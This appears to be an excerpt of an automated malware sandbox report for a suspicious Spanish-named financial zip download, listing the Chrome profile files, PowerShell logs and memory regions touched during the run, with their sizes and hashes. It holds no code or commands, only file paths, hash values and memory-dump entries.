a51e00453c3d9aceb74b281dec49e823eb7515bd7ae693ead74a8019f59d852b

SHA512
5c274f5f722e71934105e95452f0e59fa16cb87df02eaa758b36e9eddbdbc8b0cefa6e797592cc3653d5a9a77b87621e250a03ac58406d5e2123a1bda9c285d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
98fd0f42c195c732a13c1c476692c04f

SHA1
a239a3bd5cde3e1de1b58d7b62c6cb43a8221492

SHA256
b036643023d03176f227f6172341f65f7d369ac23e158c4b8e27e80d4c14c06b

SHA512
7a8ada4e932357bbd01a519e920a87a72d1d315ce3ebe620e5d37256f75ffb5df9fc2cf07d0c7169b7ce84addf0148bac5fa1c62a295d109e2fc5fe79945edbf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
53b7a55da638a0250688cb77031e9a5e

SHA1
b8cb877624377ffbfa0be2ce7b521359dc131a8e

SHA256
add8ed545e8aa9199f44774b17ba9bb7686fede4f82b03a088bda5300501aa1e

SHA512
674d9b4f381bdb4daa27b12a0ff6cd8c2cda5dc9c9a18adb5db3c3f5c821faaffbc724dd40eb92fc5c1083e06868d3e614f27859b07ab4e61020fe716c156ca3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
8e5bdcf39ac35c15a7187cb1508157e1

SHA1
a91e0d9f3557f29e329d07b6dd5b8bc9f373d054

SHA256
6fe5b3f94cfa8f1b0cb8ccae2c6d003924678b1e7f88893bff3dab819230a835

SHA512
a6f2d1d9d592244ecda0784ffe2bcbf2fbc929cb3cca60012411e027ff062b5306bc9ecf0f7d225e728d04741852f1ec6b62d7737348deb1f609965797ce6c0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
92a5451c4f8efbfc4142a5e1de8c7d0f

SHA1
7974e6a1370b2fa2fbd612200f86ee302b62fec7

SHA256
68ae996fb01c597b782d3634afaccaacef84095df728fed1eb5731ab883bb698

SHA512
adbb9ab94c2d0155fd9163a66279e175804db53248e51fc943fc4e4996b2807c411a0af4e7267c5b20f3fa5bf2190c9c2d8eff44a87d4c697b5e2a1129a9578a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
ddfb6d4336fa076ccf87ebab454d072c

SHA1
f79446863410dcba73b21b7320c905781096d140

SHA256
a222bdfd115ebb272beffd69c73ab5597b6bac386fa0691c3a9eb9463c1fa983

SHA512
fcd8590f89f3d6e63ba9ea4d5bcf676ccf16b450ea84fb7fde8523e3d76b79a604f48ff1cf246a01cb65d3325836bfde889037b6acb258ead121316315f9338e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
6c8a78efb932e56977e76c3d8e0e24c0

SHA1
e48d257a5646c507e724f5dab16a9d71622e28cc

SHA256
2dded4bdf079a6efc5355258d00af5f9804b05675131a7798031624473484cbf

SHA512
d0574d0cd475891de99d51bd2d5cbe9b6257fd52cba38e6ff718fc8253b66f9942a0b5039c660941fd8aaca6d4cb6c3d1cd5eb21bf4293915e63c68e728be472

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
51aa7721b0b62ba12e9af5490525d6c4

SHA1
4db5d3f26f6eca858833a6bcde8808c062d7c583

SHA256
04b8884d5a0c3b33d55e568c81297f982b707f57fbd526a9f19432617325a017

SHA512
2c76762d8e68f414a2610d9e863841ebff992b20654b2e651e68034bffa4a67f92b841cdc0cee52481a893092a1d172f4881a5a0b705132101a85f202c741e09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
c40c75b777731682ce7b8a2463f80885

SHA1
f4429351fd60fa44b2f366d3ce3889cf21a1bb1b

SHA256
4c51c2e58fd15cb96ba352cfe71c9df9065f6c64ce75a266caeb9e64246ac970

SHA512
411741c8d55fbc591f14b2f18c265ae41f3a071983bf023345339d667828a4a89e25af41b6a3558d68d63aca7e52b191aca546f72538d4d30dadeef53d3444e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
b009aa47dbe069a03ef9979e28f7afa9

SHA1
58c3fbc4f0becc295719b7ab2e44258aa75c4642

SHA256
b7b4094b48aec9d14301c41e17496ceb7a0fb705de89ea4724740b1764e3e9af

SHA512
965e8ab88f53cd07821185872723473a93e370a0f2eefeae446422c2516a6cefa014afaf0f0349874306dfe2d8ae46da0d717c9efbdfe21c1b115df859c288c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
dbff4cb65489bbbc7c9caae145b25ffc

SHA1
0cd6ac5efd62ae47ee9740afaf60d78722b1f821

SHA256
5c49eda4b53c79d2987442a1883c7d7eb6b96020dc4a657dd8b74560f3648575

SHA512
306c85c5f41174d902476a00e68f6ed022533c98fb16ca57c7d4cffb0d2f13b2fcc1921d77787b7993435ac9f8b60b55ad93df45fb2205388da51185a5757831

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b9e0ec4a6bce7e85ef1c210107c02de1

SHA1
399b31d9b8605c713872d07cee9d735d66594838

SHA256
87d8b85d930e2be3cf64c55d3761a3bbfa2557eb01d657317fdfba2ff735ea95

SHA512
6b917202c36603aa05b158cc1a1dc6e3330b6fa70f80e068a96032afe29e81ad6991483f5158b9854c7eef08beadbddef42b8156a39135a10fd0128da5258248

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
9ff12d94456d1c640a35c05998e29143

SHA1
d803398283af7df57da5f311c9d50211357521df

SHA256
4c51fe6a33b47d256f68f18952f6873957a19a1322b51a35604ee02160b600d4

SHA512
4a31c271a5f0b843eec9d27feb200811d7d694acbf2fc149f0c039acd061ae6d94273af06f86beb13870de83d5a02ed84462da6282a8cd383d018b415602d313

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
7d3dac22c47f2afd3c80fd0b4ea2a1d9

SHA1
91824b83e32add7af11d3c543af5aab084cfe892

SHA256
8da0e94cb38ba90acfe34a77620a6b560a64e9093a0f506edae50da42cb50063

SHA512
56e31c19e75b9a8c452c595e62590ac98211d67571083aead3fb8714c49ce97edbb99c67cf68b5a3103cc304076f0fa6d30a7aa6bb7cf85537102ea336968935

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
2e16b0ab73dc365bf656d6d3c5ad3100

SHA1
e44c04743a475ab7ab637490d32269ed3e4fda60

SHA256
fa95e47d27676837416441e876098059949dace519614e44cfb379e2208a2009

SHA512
b63ebe8e196bf3d6a1add6c123823fe24f93368a096b24c84c1c75ccb641b4a234d93645d0cbc5d568564f63d2ac2588a1fc053040eba079b1c9314ead1b016a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
6ed0b5f19fff910e1a906ebab4b35d46

SHA1
3cd4fad7373aaf3e920f3d515ba48a60481d1c8d

SHA256
a925fc6bf449758f7aa9b5b78387558ae302cf2d575fa9de0c35efa6b2b0aff4

SHA512
8c91dae8781770af1e5a0c13b1056ab8fda6dd0ef6f7715a70d33a45362b782032c97d22af1e653db1a511b943d9f2d9fe341c432e88983fce73f211e039326d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
52fcfb07c47778eb71cb5c0eede87c00

SHA1
50d7d218ced343c5e176b3313319d989f52c250a

SHA256
ed27ccd172702c181a1811a36d68d61bde0ab4f20805e4a1b965a17d353e117f

SHA512
1e92d1c42da4723c1dea63b4880da6abc547acd3d7589f64b2c72ed4be7273c07d08acc9dbb025d262e89b625056b81a533401419d9202f12de76e16d17efcde

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
9a79f7895de022497297a7fbba66ed27

SHA1
9677d2b115a2a6042f3a8998080a5736a9cdbdca

SHA256
6ec6ad61e975a16d20ae5204771fb0e2523850e0aeade0607160ffb896003b97

SHA512
860738d17b7333f2c387c0dc94559e34645e7e19d6fbd5f89ac01f781e5766714b81999a68d1cf5106dd78bf59ab3464d3683a11f26beb9ad234d77998ed69cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
87227507588fcabe8b6482609932232a

SHA1
d653f3873f061d301d7f69f01cece1cbf63bd3a9

SHA256
590e63323dbac8dc5a5489bced37058fad8796f01d89ecbc38bf7531dfe61a9a

SHA512
3adceb8d617a91cd58a9a122f7362c20e79be72649f00d6a78f6b1f6b37fb99c988ec442e69fc10aa868c4f3fc7d466f3a3663cf4d3c9f9847d294535a97572d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
8d8ac811dcc314afae1ea23b9a0ffdcf

SHA1
1113702af97d6d86176f1020b5147c5348cca4fc

SHA256
76913e7a88f0c587e728ec4b199f556b605cb3bdaea4a9925e656f74ad9d67ee

SHA512
57f4050d792f15ecbe0fa30d0224453cf3ed7a2a3d38bd2b460d9b182b8694b467577d4170bff76760444a358e679fee7ab0df17c53f9b02fa68ee80d05c0b34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
8eb3173017a9cf478824637fe1435d86

SHA1
0b50659faef62f740d0d446f345af92a9f3b9c08

SHA256
1b0635ae1123e336ff1c656c0c025c71edd93581a1cc9c0b5f21630b0478d5a9

SHA512
ae75594c0a6e6bf0e13a23411d78a6e3772ecae3f8fdaba26f0623ab255fd75ef14ba82e112c455e78216469871051aefac6ceb55df44cf351e111082a239287

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\a9d8d632-784d-4420-a230-ac5b56773e5c.tmp

Filesize
11KB

MD5
d3d35ff2f67a01bb12a363fca759cf87

SHA1
9f263146be7291e56a8e082283d44e1289066dec

SHA256
6f625da8147903278df622559f1185a014937f35803c172cb57673c197bf9067

SHA512
4d00296276c26afee7906f80501cc4b9829411770b897d33452998fa7086b50235a416883c486ba1f6cafa174ad7ea397e939513f63e6edd65e092552fcf8bff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
a69b7717a3994c104320a8debbbde4f7

SHA1
dc13a778e2a4b64b65a14d41b8a926926af06f0e

SHA256
60950c0a950c78866370ff7818f270173a2d55ee0fbab26767665a69bcb88a15

SHA512
da36e9dff867e82351ce9aced28cb99181982a6e87d66aeaa8765fd17ad816e8945f034445bb3861f59b58847ae593ba425f0dc9fd0a0bd8ac4d5acbe364ebf1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
dbb1a760732dac7e5470f8d561b7d4bd

SHA1
2b610d1bbd16e782f4f7471626f9635836555409

SHA256
5a5282e7cb5fc87f73b64a2016a2e778c424d3b313e51d4e87cafbdce8c3e0fd

SHA512
057e6aacbb124d24bbadd3a848aafa19e42dbb16f3f77cee66e7f00b0ee38be5d7e2b27575cb173f9e1bd7f022f2881a228b37f7fe5fb07bd218c2ae0128dd71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
b7dc89b739fe2e0b7195871079e3c482

SHA1
eb2265f5333d7ab800fe24b25e64fac30da6d3a4

SHA256
6eb3be58681337d1b2a24cc68642a1bb91a4c90792906c6086845ffce8231fe9

SHA512
1ac5dc31b23ed522336a203cb728b108c250b82a54c4adea9fe1053db59f0352970cb041504182c16d30e1b564753cdb47d2d89d090e3ebed85f8b16d7c0f0de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_regsql.exe.log

Filesize
323B

MD5
4af72c00db90b95c23cc32823c5b0453

SHA1
80f3754f05c09278987cba54e34b76f1ddbee5fd

SHA256
5a99dc099cb5297a4d7714af94b14f170d8a0506899c82d6b8231a220f8dba5d

SHA512
47aa798c4822bfd0b2a9110fcd1531494da99cf6e4aba5b59bfc36e21fcb1bdb5378189318bbb8519f0e8be732d90637f787ab63997d106bbcff31396155f9ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c2591b8d3c298836fc77aeec431b0a88

SHA1
56aed0d369ac0a912275f1d29075c78da932e2a7

SHA256
bfca64476080417d90c94877309a740be930c08c7d60bd2579ff9b523b4d9c9f

SHA512
95162e3fd633a27db36565cacc0c6e0ce220e080ca402849238cf4db42ed19772959c4d664a82cfbfeceac4271d49a0f1f5a2c0edceecbd100d7f7797a5211c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d5d8cf9f65ce79e552409c240295219

SHA1
ec5e938110638dcd176ce0645682a0d3949dd5a8

SHA256
817d6bfa16b959aae0dec64568ec6d98fdd61a205c61dde60551e192e5478596

SHA512
0d06c42b9c5648311000eefe9bd5a952dafd999b5c7ab17dbbebb6c6d9cd4b1de451e13ef0af72dfa3557aee8cb8bb5521642db843c3f61dfd701dd6c95afb68

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxfdzymt.gcg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\ACCIÓN FINANCIERA REF. 0924959835.zip.crdownload

Filesize
23KB

MD5
103ba5cdfd74efae28df614e137d62cd

SHA1
d4ce2ef4aa608400fec28545b153f63a3ae01635

SHA256
0e1ad93dee5a6c9e2b1cbb5fc4d07093b7e71815c59f2098691c7aa9357a3428

SHA512
949ca14a2b08390ef9c4bcfa95f797ce9e67baf2359400e010c9b45638e77996ea49815f9502c04b37ace6b6d673bb8a2f8080a056360660f4faa33401102a2b

Download Submit
memory/468-122-0x000002E7A86D0000-0x000002E7A86F2000-memory.dmp

Filesize
136KB

Download
memory/468-141-0x000002E7D0D30000-0x000002E7D0EEA000-memory.dmp

Filesize
1.7MB

Download
memory/468-142-0x000002E790210000-0x000002E79021C000-memory.dmp

Filesize
48KB

Download
memory/1308-146-0x00000000051C0000-0x000000000525C000-memory.dmp

Filesize
624KB

Download
memory/1308-149-0x0000000006120000-0x000000000612A000-memory.dmp

Filesize
40KB

Download
memory/1308-148-0x00000000061C0000-0x0000000006252000-memory.dmp

Filesize
584KB

Download
memory/1308-147-0x0000000005970000-0x0000000005F14000-memory.dmp

Filesize
5.6MB

Download
memory/1308-143-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download